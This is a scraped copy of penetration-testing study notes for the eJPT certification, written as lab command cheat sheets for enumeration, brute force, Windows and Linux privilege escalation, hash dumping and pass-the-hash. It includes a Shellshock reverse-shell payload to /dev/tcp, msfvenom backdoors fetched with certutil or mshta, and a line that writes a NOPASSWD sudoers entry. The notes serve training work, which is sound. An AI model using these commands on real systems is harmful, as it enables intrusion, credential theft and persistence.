Scribd
Upload
181 views57 pages

E JPT v2 Notes by Hamid TCM Security

Uploaded by

werkingpcrequest
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
181 views57 pages

E JPT v2 Notes by Hamid TCM Security

Uploaded by

werkingpcrequest
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

lOMoARcPSD|51490668

E JPT v2 notes by hamid - tcm security

Sciences de l'ingénieur (Institut des Sciences et Technologies de Paris)

Scan to open on Studocu

Studocu is not sponsored or endorsed by any college or university


Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

eJPT V2 : notes
JR PENTESTER

B Y
E lm a r r o u n i
Hamid

Downloaded by Wokwok (werkingpcrequest@gmail.com)


lOMoARcPSD|51490668

eJPT V2:
Table des matières
1. Information gathering : .......................................................................................................................5
a. passive:................................................................................................................................. 5
b. active: ................................................................................................................................... 5

2. Footprintinf & scaning:........................................................................................................................6


a. SMB:...................................................................................................................................... 7
c. FTP:..................................................................................................................................... 10

d. SSH: .................................................................................................................................... 10
e. HTTP:.................................................................................................................................. 10

iis: .........................................................................................................................................................10

apache: ................................................................................................................................................11
f. mysql: ................................................................................................................................. 13

3. Vulnerability Assessment:..................................................................................................................15

4. System/Host Based Attacks windows: .............................................................................................16


a. IIS-webdav: ........................................................................................................................ 16
b. SMB:.................................................................................................................................... 16
c. RDP:.................................................................................................................................... 16
d. WinRM:............................................................................................................................... 16
e. UAC Bypass:....................................................................................................................... 18
f. Privilege escalation : impersonate .................................................................................. 19
g. Privilege escalation : Powersploit - unattend : .............................................................. 20
h. Privilege escalation : method 2- unattend ..................................................................... 22

i. Dump hashes with mimikatz & kiwi : ............................................................................. 22


j. Pass-the-hash: ................................................................................................................... 23

5. System/Host Based Attacks linux: ....................................................................................................24


a. Shellsock CVE 2014-6271: ................................................................................................ 24

2
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

b. Ssh ...................................................................................................................................... 24

c. ftp: ...................................................................................................................................... 24

d. Samba : .............................................................................................................................. 24
e. Linux kernel exploitation : ............................................................................................... 25
f. Cron jobs : .......................................................................................................................... 25

g. Explotation SUID binaries : .............................................................................................. 26

h. Dump hash :...................................................................................................................... 27


6. Network Based Attacks: .....................................................................................................................28
a. DNS: ................................................................................................................................... 28

b. wireshark: .......................................................................................................................... 30
c. ARP poisoning : ................................................................................................................. 30
Dsniff tools : .......................................................................................................................................31
d. tshark : ............................................................................................................................... 31

7. metasploit:...........................................................................................................................................33

a. pivoting : ............................................................................................................................ 34
b. apache: ............................................................................................................................... 34
c. mysql: ................................................................................................................................. 35

d. smtp:................................................................................................................................... 36

e. WMAP: ............................................................................................................................... 38
f. msfvenom: ......................................................................................................................... 38
g. Aoutmating Metasploit: ................................................................................................... 39
h. Apache Tomcat:................................................................................................................. 40

i. FTP:..................................................................................................................................... 40
j. meterpter: .......................................................................................................................... 40
k. windows post exploitation : ............................................................................................. 41
bypass UAC:...........................................................................................................................................41
impersonate: .........................................................................................................................................41
psexec: ..................................................................................................................................................41
persistence: ...........................................................................................................................................41
enable_rdp: ...........................................................................................................................................41
keylogging: ............................................................................................................................................42
clearing event logs: ................................................................................................................................42
pivoting: ................................................................................................................................................42
l. linux post exploitation : ................................................................................................... 43

3
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

rootkit: ..................................................................................................................................................43
persistence: ...........................................................................................................................................43
8. explotation : ........................................................................................................................................44

a. banner grabbing: .............................................................................................................. 44

b. searchsploit:....................................................................................................................... 44
c. using exploit manually :................................................................................................... 44
d. netcat : ............................................................................................................................... 44

e. black box explotation : ..................................................................................................... 45

9. Post explotation : ...............................................................................................................................46


1. Windows Local Enumeration: .......................................................................................... 46

2. linux Local Enumeration: ................................................................................................. 47

3. Transferring Files To Windows & Linux Targets: ........................................................... 48

4. Windows Privilege Escalation: ......................................................................................... 49


5. linux Privilege Escalation: ................................................................................................ 49
6. Windows Persistence: ....................................................................................................... 49

7. linux Persistence: .............................................................................................................. 49


8. Dumping & Cracking Windows Hashes: ......................................................................... 49
9. Dumping & Cracking linux Hashes: ................................................................................ 49
10. pivoting : ............................................................................................................................ 49

11. clearn tracks : .................................................................................................................... 49

10. web explotation : ...............................................................................................................................50


a. cross site scripting (xss): ................................................................................................... 51
Reflected attacks: ................................................................................................................................51
Persistent XSS attacks ..........................................................................................................................51
Cookie Stealing via XSS: .......................................................................................................................51
b. sql injection (xss):.............................................................................................................. 52
c. ZAPorxy: ............................................................................................................................ 53

d. nikito: ................................................................................................................................. 53
e. sqlmap: .............................................................................................................................. 54

f. XSSer: ................................................................................................................................. 55

4
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

1. Information gathering :
a. passive:
-WHOIS
- robots.txt “this is file in any website”
-sitemap.xml “like robots.txt”
-Wapplalyzer “it’s extension in browser to know what the technologie use in
website”
-whatweb
-HTrack in kali webhttrack
-netcraft “it’s a sitewep”
- dnsrecon -d <domine>
-dnsdumpster “it’s site for information gathering “
-wafw00f <site web > #it’s a tool in kali linux to indentify web firewall
-sublist3r -d <domine> -e <search engines >
-google dorks : <word> site:<url>
<word> intitle:<titre>
inurl:<word> intitle:<word>
site:*.<domine> filetype:<extension>
cash:<domine>
-waybackmachine
-theHarvster “search for email “
-haveibeenpwned.com

b. active:
- dns zone transfers
-dnsenum
-nmap

5
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

2. Footprintinf & scaning:


-arp-scan,wireshark,nmap

6
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

a. SMB:
We have discovered that multiple ports are open. SMB port 445 is also exposed. We will run the Nmap
script to list the supported protocols and dialects of an SMB serve:
nmap -p445 --script smb-protocols <ip>
Running security mode script to return the information about the SMB security level:
nmap -p445 --script smb-security-mode <ip>
We have the SMB server credentials i.e <x>:<x> , We will use it with Nmap script to scan the target to
discover sensitive information :
nmap -p445 --script smb-enum-sessions <ip>
nmap -p445 --script smb-enum-sessions --script-args smbusername=<x>,smbpassword=<x> <ip>

Enumerating all available shares :


nmap -p445 --script smb-enum-shares <ip>
nmap -p445 --script smb-enum-shares --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerate the windows users on a target machine:
nmap -p445 --script smb-enum-users --script-args smbusername=<x>,smbpassword=<x> <ip>
Get information about the server statistics. It uses port 445 and port 139 to fetch the details:
nmap -p445 --script smb-server-stats --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating available domains on a target machine :
nmap -p445 --script smb-enum-domains --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating available user groups on a target machine:
nmap -p445 --script smb-enum-groups --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating services on a target machine:
nmap -p445 --script smb-enum-services --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating all the shared folders and drives then running the ls command (The ls command is used to
list files or directories, similarly dir in windows) on all the shared folders:
nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=<x>,smbpassword=<x> <ip>
Running smbmap tool to discover all shared folders and drives. We will find all the shared folders using
a guest user account:
smbmap -u <user> -p "<password>” -d . -H <ip>
smbmap -H <ip> -u <user> -p <paasword> -x '<command>'
Listing all drives on the specified host:
smbmap -H <ip> -u <user> -p <paasword> -L
List contents of the directory of C:\ drive:
smbmap -H <ip> -u <user> -p <paasword> -r ‘C$’

7
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

Uploading a sample file :


smbmap -H <ip> -u <user> -p <paasword> --upload '/root/backdoor' 'C$\backdoor'
download file:
smbmap -H <ip> -u <user> -p <paasword> 771' --download '<path>'

b. Samba:
Find the exact version of samba server by using appropriate nmap script:
nmap --script smb-os-discovery.nse -p 445 <ip>
Find the exact version of samba server by using smb_version metasploit module:
->msfconsole
->use auxiliary/scanner/smb/smb_version
->set RHOSTS <ip>
->exploit
What is the NetBIOS computer name of samba server? Use appropriate nmap scripts :
nmap --script smb-os-discovery.nse -p 445 <ip>
Find the NetBIOS computer name of samba server using nmblookup:
nmblookup -A <ip>
Using smbclient determine whether anonymous connection (null session) is allowed on the samba
server or not:
smbclient -L <ip> -N
Using rpcclient determine whether anonymous connection (null session) is allowed on the samba server
or not:
rpcclient -U "" -N <ip>
Find the OS version of samba server using rpcclient:
rpcclient -U "" -N <ip>
Find the OS version of samba server using enum4Linux:
enum4linux -o <ip>
Find the server description of samba server using smbclient:
smbclient -L <ip> -N
Is NT LM 0.12 (SMBv1) dialects supported by the samba server? Use appropriate nmap script :
nmap -p445 --script smb-protocols <ip>
Is SMB2 protocol supported by the samba server? Use smb2 metasploit module:
msfconsole
use auxiliary/scanner/smb/smb2
set RHOSTS <ip>

8
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

exploit
List all users that exists on the samba server using appropriate nmap script:
nmap --script smb-enum-users.nse -p445 <ip>
List all users that exists on the samba server using smb_enumusers metasploit modules:
msfconsole
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <ip>
exploit
List all users that exists on the samba server using enum4Linux:
enum4linux -U <ip>
List all users that exists on the samba server using rpcclient
rpcclient -U "" -N <ip>
enumdomusers
Find SID of user “admin” using rpcclient:
rpcclient -U "" -N <ip>
lookupnames admin
List all available shares on the samba server using smb_enumshares metasploit module:
Msfconsole
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS <ip>
exploit
List all available shares on the samba server using enum4Linux:
enum4linux -S <ip>
List all available shares on the samba server using smbclient:
smbclient -L <ip>
Find domain groups that exists on the samba server by using enum4Linux:
enum4linux -G <ip>
Find domain groups that exists on the samba server by using rpcclient:
rpcclient -U "" -N <ip>
enumdomgroups
Is samba server configured for printing?:
enum4linux -i <ip>
How many directories are present inside share “public”?:

9
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

smbclient //<ip>/public -N
ls
Which share is read only?:
smbmap -H <ip> -u <user> -p <password>
List the named pipes available over SMB on the samba server?:
Msfconsole
use auxiliary/scanner/smb/pipe_auditor

c. FTP:
Check whether anonymous login is allowed on the ftp server using nmap script:
nmap --script ftp-anon <ip>

d. SSH:
Fetch the banner using netcat and check the version of SSH server:
nc <ip> 22
How many “encryption_algorithms” are supported by the SSH server:
nmap --script ssh2-enum-algos <ip>
What is the ssh-rsa host key being used by the SSH server:
nmap --script ssh-hostkey --script-args ssh_hostkey=full <ip>
Which authentication method is being used by the SSH server for user:
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<ip>" <ip>
Find the password of user “administrator” use appropriate nmap:
echo "administrator" > users
nmap -p 22 --script ssh-brute --script-args userdb=/root/users <ip>
Find the password of user “root” using ssh_login metasploit module with userpass dictionary:
/usr/share/wordlists/metasploit/root_userpass.txt :
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.40.231.3
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set STOP_ON_SUCCESS true
set verbose true exploit

e. HTTP:
iis:

10
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

unning whatweb tool to find all possible information about the target server:
whatweb <ip>
use the httpie tool to gather target server information :
http <ip>
Running the dirb tool on the target server port 80 to discover the web server’s directories and
subdirectories:
dirb http://<ip>
We have found all the basic details about the target server without using the browser. We could also
use browsh “A fully-modern text-based browser, rendering to TTY and browsers”:
browsh --startup-url http://<ip>/Default.aspx
Running http-enum nmap script to discover interesting directories:
nmap --script http-enum -sV -p 80 <ip>
Running Header script to get the IIS server header information:
nmap --script http-headers -sV -p 80 <ip>
Running http-methods script on /webdav path to discover all allowed methods:
nmap --script http-methods --script-args http-methods.url-path=/webdav/ <ip>
Running webdav scan Nmap script to identify WebDAV installations the script uses the OPTIONS and
PROPFIND methods to detect it:
nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ <ip>

apache:
Which web server software is running on the target server and also find out the version using nmap:
nmap -sV -script banner <ip>
Which web server software is running on the target server and also find out the version using suitable
metasploit module:
msfconsole
use auxiliary/scanner/http/http_version
Check what web app is hosted on the web server using curl command:
curl http://<ip>/
Check what web app is hosted on the web server using browsh CLI based browser:
browsh --startup-url <ip>
Check what web app is hosted on the web server using lynx CLI based browser:

11
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

lynx http://<ip>
Perform bruteforce on webserver directories and list the names of directories found. Use brute_dirs
metasploit module :
use auxiliary/scanner/http/brute_dirs
use the directory buster (dirb) with tool/usr/share/metasploit-framework/data/wordlists/directory.txt
dictionary to check if any directory is present in the root folder of the web server. List the names of
found directories :
dirb http://192.30.247.3
/usr/share/metasploit-framework/data/wordlists/directory.txt
Which bot is specifically banned from accessing a specific directory?:
use auxiliary/scanner/http/robots_txt

12
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

f. mysql:
What command is used to connect to remote MySQL database:
mysql -h <ip> -u root
How many databases are present on the database server?:
show databases;
How many records are present in table “authors”? This table is present inside the “books” datab:
use books;
select count(*) from authors;
Dump the schema of all databases from the server using suitable metasploit module?:
msfconsole
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS <ip>
set USERNAME root
set PASSWORD ""
exploit
How many directories present in the /usr/share/Metasploit framework/data/wordlists/directory.txt,
are writable? List the names :
use auxiliary/scanner/mysql/mysql_writable_dirs
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set RHOSTS <ip>
set VERBOSE false
set PASSWORD ""
exploit
How many of sensitive files present in /usr/share/metasploit-
framework/data/wordlists/sensitive_files.txt are readable? List the names :
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS <ip>
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
set PASSWORD ""
exploit
Find the system password hash for user "root":
select load_file("/etc/shadow");
How many database users are present on the database server? Lists their names and password hashes:

13
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS <ip>
set USERNAME root
set PASSWORD ""
Check whether anonymous login is allowed on MySQL Server:
nmap --script=mysql-empty-password -p 3306 <ip>
Check whether “InteractiveClient” capability is supported on the MySQL server:
nmap --script=mysql-info -p 3306 <ip>
Enumerate the users present on MySQL database server using mysql-users nmap script:
nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>
List all databases stored on the MySQL Server using nmap script:
nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>
Find the data directory used by mysql server using nmap script:
nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>

Check whether File Privileges can be granted to non admin users using mysql-audit nmap script:
nmap --script=mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-
audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" -p 3306 <ip>
Dump all user hashes using nmap script:
nmap --script mysql-dump-hashes --script-args="username='root',password=''" -p 3306 <ip>
Find the number of records stored in table “authors” in database “books” stored on MySQL Server using
mysql-query nmap script:
nmap --script=mysql-query --script-args="query='select count(*) from
books.authors;',username='root',password=''" -p 3306 <ip>
Identifying valid MSSQL users and their passwords using provided username and password list:
nmap -p 1433 --script ms-sql-brute --script-args
userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-
passwords.txt 10.6.24.17
Extracting sysusers from MSSQL and storing the output in a file i.e output.txt:
nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-
sql-query.query="SELECT * FROM master..syslogins" 10.6.24.17-oN output.txt
Dump the hashes of MSSQL users:
nmap -p 1433 --script ms-sql-dump-hashes --script-args
mssql.username=admin,mssql.password=anamaria 10.6.24.17

14
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

Execute a command using xp_cmdshell using Nmap script:


nmap -p 1433 --script ms-sql-xp-cmdshell --script-args
mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.6.24.17
Reading the flag using xp_cmdshell:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args
mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" <ip>
Running MSSQL enumeration module to find all possible information
use auxiliary/admin/mssql/mssql_enum
set RHOSTS <ip>
exploit
Extract all MSSQL users :
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS <ip>
exploit
Execute a command using mssql_exec module:
use auxiliary/admin/mssql/mssql_exec
set RHOSTS 10.0.20.101
set CMD whoami
exploit
Running MSSQL enum domain accounts module. This module dumps the information such as Windows
domain users, groups, and computer accounts:
use auxiliary/admin/mssql/mssql_enum_domain_accounts

3. Vulnerability Assessment:
-nessus
-open vas

15
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

4. System/Host Based Attacks windows:


a. IIS-webdav:
Running davtest tool :
Davtest -auth <user>:<password > -url http://<ip>/webdav
Upload a .asp backdoor on the target machine to /webdav directory using cadaver utility:
cadaver http://<ip>/webdav
put /usr/share/webshells/asp/webshell.asp
http://<ip>/webdav/webshell.asp
Run metasploit framework and exploit the target using the IIS webdav exploit module:
use exploit/windows/iis/iis_webdav_upload_asp
set PATH /webdav/metasploit%RAND%.asp

b. SMB:
Running psexec module to gain the meterpreter shell:
set RHOSTS <ip>
set SMBUser <user>
set SMBPass <pass>

c. RDP:
RDP (Remote Desktop Protocol) default port is 3389. But, we have not discovered that port. We can
notice the port 3333 is exposed. We can Identify RDP endpoints using an auxiliary module on port 3333
if it’s running RDP:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
set RPORT 3333
Running hydra tool to find valid username and password from the provided list:
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-
framework/data/wordlists/unix_passwords.txt rdp:// <ip> -s 3333
We have discovered four valid users and passwords. Access the remote server using xfreerdp tool:
xfreerdp /u:<user> /p:<password> /v:<ip>

d. WinRM:
winRM typically uses ports 5985 and 5986
Checking WinRM supported authentication method using an auxiliary module:
use auxiliary/scanner/winrm/winrm_auth_methods
Execute command on the target server using winrm_cmd module:
use auxiliary/scanner/winrm/winrm_cmd

16
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

set CMD whoami


use the winrm_exec exploit module to get the meterpreter shell:
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <ip>
set USERNAME <user>
set PASSWORD <password>
set FORCE_VBS true

17
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

e. UAC Bypass:
Checking the current user :
Getuid
Sysinfo
We can observe that we are running as an admin user. Migrate the process in explorer.exe. First, search
for the PID of explorer.exe and use the migrate command to migrate the current process to the explorer
process:
ps -S explorer.exe
migrate <pid>
Elevate to the high privilege:
Getsystem
Get a windows shell and check if the admin user is a member of the Administrators group:
shell
net localgroup administrators
Generating malicious executable using msfvenom and running it on the target machine to gain
administrator user privileges:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > 'backdoor.exe'
file ''backdoor.exe ‘’
Switch the directory to the user’s temp folder and upload the Akagi64.exe and backdoor.exe
executable:
CTRL + C
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
Start another msfconsole and run a multi handler:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 4444
Switch back to the meterpreter and run the Akagi64.exe executable:
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Dump the hashes :
Hashdump

18
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

f. Privilege escalation : impersonate


We cannot read the flag with current privilege. The flag is located into the Administrator’s Desktop
folder. Load incognito plugin and check all available tokens.
load incognito
list_tokens -u
We can notice that the Administrator user token is available. Impersonate the Administrator user token
and read the flag:
impersonate_token ATTACKDEFENSE\\Administrator
getuid

19
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

g. Privilege escalation : Powersploit - unattend :


Source: https://github.com/PowerShellMafia/PowerSploit
PowerSploit “PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid
penetration testers during all phases of an assessment. PowerSploit is comprised of the following
modules and scripts:”
PowerUp.ps1 “PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations.”
We will run the powerup.ps1 Powershell script to find privilege escalation vulnerability
Powershell.exe
cd .\Desktop\PowerSploit\Privesc\
ls
Import PowerUp.ps1 script and Invoke-PrivescAudit function
powershell -ep bypass (PowerShell execution policy bypass)
. .\PowerUp.ps1
Invoke-PrivescAudit
Reading Unattend.xml file:
cat C:\Windows\Panther\Unattend.xml
Decoding administrator password using Powershell:
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))

echo $password
We are running a command prompt as an administrator user using discover credentials:
runas.exe
/user:<user> cmd
<password>
Whoami
Running the hta_server module to gain the meterpreter shell. Start msfconsole
msfconsole -q
use exploit/windows/misc/hta_server
exploit
Gaining a meterpreter shell
You need to use your own metasploit HTA server link
mshta.exe http://<ip>:8080/<link>.hta

20
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

21
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

h. Privilege escalation : method 2- unattend


Create payload by msfvenom:
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<lport> -f exe > payload.exe
Run server in port 80
python -m SimpleHTTPServer 80
download the payload from target machine:
certutil -urlcachev -f http://<kali_machine/payload.exe
run multi handler in Metasploit for listing:
use exploit/multi/handler
set lport <port>
set lhost <port>
set payload windows/meterpreter/reverse_tcp
run
we will search for unattend file by meterpreter or use manually search :
search -f unattend.xml ; cat unattend.xml ; save the encoding password in txt
base64 -d paasword.txt
psexcec.py Administrator@ip

i. Dump hashes with mimikatz & kiwi :


Mimikatz:
Upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
Shell
.\mimikatz.exe
Check require privileges
Privilege::debug
Dump hashes :
Lsadump::sam
Lsadump::secret
Kiwi:write this commad in the meterpreter then tab ‘?’ to show the options
Load kiwi

22
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

j. Pass-the-hash:
Service postgresql start
Migrate -N lsass.exe
hashdump
Get the ntlm hashes
use exploit/windows/smb/psexec
set lport 4422
set rhosts <ip>
set smbuser administrator
set smpass <nl>:<ntlm>
set target native\ upload

in another way:
crackmapexec smb <ip> -u administrator -H <ntlm hash> -x <command

23
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

5. System/Host Based Attacks linux:


a. Shellsock CVE 2014-6271:
Check for shellshock vulnerability if it exists:
nmap --script http-shellshock --script-args “http-shellshock.uri=/gettime.cgi” <ip>
by using burp suit and firefox with foxyproxy ,send request to repeater and change the value of user
agent by this code :
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
In kali machine : nc -nvlp 1234
In the same place in burp :
() { :; }; echo; echo; /bin/bash -c 'bash -i>& /dev/tcp/<ip>/1234 0>&1’

b. Ssh
brut force by hydra :
haydra -L <user_file> -P <pass_file> -t 4 <ip> ssh
after gain initial access access in linux :
vrsion of distribution linux
cat etc/*issue
version if linux kernal :
uname -r
the versions 0.6.0-0.80 are vulnerable to an authentication bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true

c. ftp:
Find the password of user “sysadmin” using nmap script:
echo "sysadmin" > users
nmap --script ftp-brute --script-args userdb=/root/users -p 21 <ip>
ftp <ip>
command for download from ftp server : get

d. Samba :
After get password by brute force , we will get more information about target machine:
Smbmap -H <host > -u <user> -p <password >
Smbclient //ip/usershare -U admin
Enum4linuix -a –u <user> -p <password>
Or we can use this module if the samba is vulnerable

24
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

use exploit/linux/samba/is_known_pipename

e. Linux kernel exploitation :


Linux-Exploit-Suggester - This tool is designed to assist in detecting security deficiencies for
given Linux kernel/Linux-based machine. It assesses (using heuristicsmethods) the exposure of the
given kernel on every publicly known Linux kernel exploit.
GitHub: https://github.com/The-Z-Labs/linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-
suggester.sh -O les.sh

Afhfer get initial exploitation (meterpreter session without permission)


Tap command shell then tab command bin/bash -i
Groups <service-account>
Back to meterpreter session and go to directory /tmp .then , tab this commande:
Upload <path of tool les.sh>
Open shell session again :
chmod +x les.sh
excute les.sh and after that ,we will btain information about the kernel if it’s vulnerable we will get
lien of code ,mostly it’s written in c , if it was writting in c we will doing this steps:
- Install to gcc for compile the c code and rename code of c “ rm <old name.c> <new name > “ ,
flowing the steps was writing in code comments
- Upload the code in meterpreter session , then open shell session , change mood of code “
chmod +x <name>
- Then flowing the steps was writing in code comments

f. Cron jobs :
Cron is a life save for admins when it comes to doing periodic maintainence tasks on the
system. They can even be used in cases where tasks are performed within individual user
directories. However, such automations need to be used with caution or can lead to easy privilege
escalation attacks
-Cron jobs can also be run as any user on the system, this is a very important
factor to keep an eye on as we will be targeting Cron jobs that have been configured to be run as the
“root” user.
-This is primarily because, any script or command that is run by a Cron job will run as the root user
and will consequently provide us with root access. In order to elevate our privileges, we will need to
find and identify cron jobs
-scheduled by the root user or the files being processed by the cron job

After get exploitations in user without root privilege we will flowing this methode :
Firstly, we will search for temporally files have variable time creation
ls -l “for see the creation time and permission ”

25
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

we will go to tab this command for showing how this temporally file work :
grep -nri “<path_of_file> /<bin , root , etc , usr ….>
if we find the original bash script and if we have the permission to edit it we will add this
command for to make normal user to escalate permission without the password :
printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > <path_of_bahscript>
 The /etc/sudoers file is what is used to determine if a user has permission

We can tab this command for show the cron jons was running in the current user :
crontab -l

g. Explotation SUID binaries :


setuid: a bit that makes an executable run with the privileges of the owner of the file

if we found two binary file , <first_file> has SUID permission (‘ls -l’) and <second_file> has root
privilege , and we found the <second_file> are executing when we execute <first_file> :
strings <first_file>
so we can remove <second_file> and creat new file with same name and add /bin/bash to its content
and execute <first_file>:
rm <second_file>
cp /bin/bash <second_file>
./ <first_file>

26
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

h. Dump hash :
All of the information for all accounts on Linux is stored in the passwd file located in:
/etc/passwd
All the encrypted passwords for the users are stored in the shadow file. it can be found in the
following directory: /etc/shadow
$1 MD5
$2blowfish
$5 SHA-256
$6SHA-512

This script nmap help us to discover vulnerability for exemple in ftp

nmap --script vuln -p 21 <ip>

Before we use Metasploit we will run service of Postgres data base for work with
msfconsole without any problems :
/etc/init.d/postgresql start
so after we found the exploit in metasploit and we exploted:
we can use another module in msf to obtain hash :
use post/linux/gather/hashdump
set SESSION 1
and use another module to crack hash :
use auxiliary/analyze/crack_linux
set SHA512 true
run

27
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

6. Network Based Attacks:


a. DNS:
What is DNS:
DNS (Domain Name System) provides a simple way for us to communicate with devices on the
internet without remembering complex numbers. Much like every house has a unique address for
sending mail directly to it, every computer on the internet has its own unique address to
communicate with it called an IP address. An IP address looks like the following 104.26.10.229, 4
sets of digits ranging from 0 - 255 separated by a period. When you want to visit a website, it's
not exactly convenient to remember this complicated set of numbers, and that's where DNS can
help

DNS Record Types :


DNS isn't just for websites though, and multiple types of DNS record exist. We'll go
over some of the most common ones that you're likely to come across.

A Record :
These records resolve to IPv4 addresses, for example 104.26.10.229
AAAA Record :
These records resolve to IPv6 addresses, for example 2606:4700:20::681a:be5
CNAME Record:
These records resolve to another domain name, for example, TryHackMe's online
shop has the subdomain name store.tryhackme.com which returns a CNAME
record shops.shopify.com. Another DNS request would then be made to
shops.shopify.com to work out the IP address.
MX Record:
These records resolve to the address of the servers that handle the email for the
domain you are querying, for example an MX record response for tryhackme.com
would look something like alt1.aspmx.l.google.com. These records also come
with a priority flag. This tells the client in which order to try the servers, this is
perfect for if the main server goes down and email needs to be sent to a backup
server.
TXT Record
TXT records are free text fields where any text-based data can be stored. TXT
records have multiple uses, but some common ones can be to list servers that
have the authority to send an email on behalf of the domain (this can help in the
battle against spam and spoofed email). They can also be used to verify
ownership of the domain name when signing up for third party services.

What happens when you make a DNS request

28
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

1. When you request a domain name, your computer first checks its local cache
to see if you've previously looked up the address recently; if not, a request to
your Recursive DNS Server will be made.
2. A Recursive DNS Server is usually provided by your ISP, but you can also
choose your own. This server also has a local cache of recently looked up
domain names. If a result is found locally, this is sent back to your computer,
and your request ends here (this is common for popular and heavily
requested services such as Google, Facebook, Twitter). If the request cannot
be found locally, a journey begins to find the correct answer, starting with the
internet's root DNS servers.
3. The root servers act as the DNS backbone of the internet; their job is to
redirect you to the correct Top Level Domain Server, depending on your
request. If, for example, you request www.tryhackme.com, the root server will
recognise the Top Level Domain of .com and refer you to the correct TLD
server that deals with .com addresses.
